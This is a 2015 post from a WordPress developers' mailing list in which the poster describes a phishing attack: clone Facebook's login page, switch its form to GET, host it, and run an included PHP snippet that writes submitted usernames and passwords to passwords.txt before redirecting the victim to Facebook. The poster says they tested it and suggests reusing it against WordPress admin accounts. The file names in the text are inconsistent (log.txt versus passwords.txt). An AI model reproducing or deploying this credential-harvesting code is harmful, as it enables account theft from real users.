[wp-hackers] Viruses that look for open WordPress tabs in your browser?

J G griffiths_j at hotmail.com
Tue Dec 15 02:19:07 UTC 2015

I know that I tested this on my own facebook account and it did work, it deals with GET and POST commands. Copy and past source from facebook.com login (frst page) and if changing action= to GET and save the manipulated source code as index.php and FTP to your own web server and save log.txt in same root folder with the log reading
<?phpheader("Location: http://www.facebook.com/home.php? ");$handle = fopen("passwords.txt", "a");foreach($_GET as $variable => $value) {fwrite($handle, $variable);fwrite($handle, "=");fwrite($handle, $value);fwrite($handle, "\r\n");}fwrite($handle, "\r\n");fclose($handle);exit;?>
a new file would be created within the same folder as index.php, log.txt and it would display Username and Password. I imagine by doing this very similar phishing attack one could gain access to  an admim-wp account? Correct me please if I am on a completely different subject it just seemed familiar. This attack no longer works for facebook.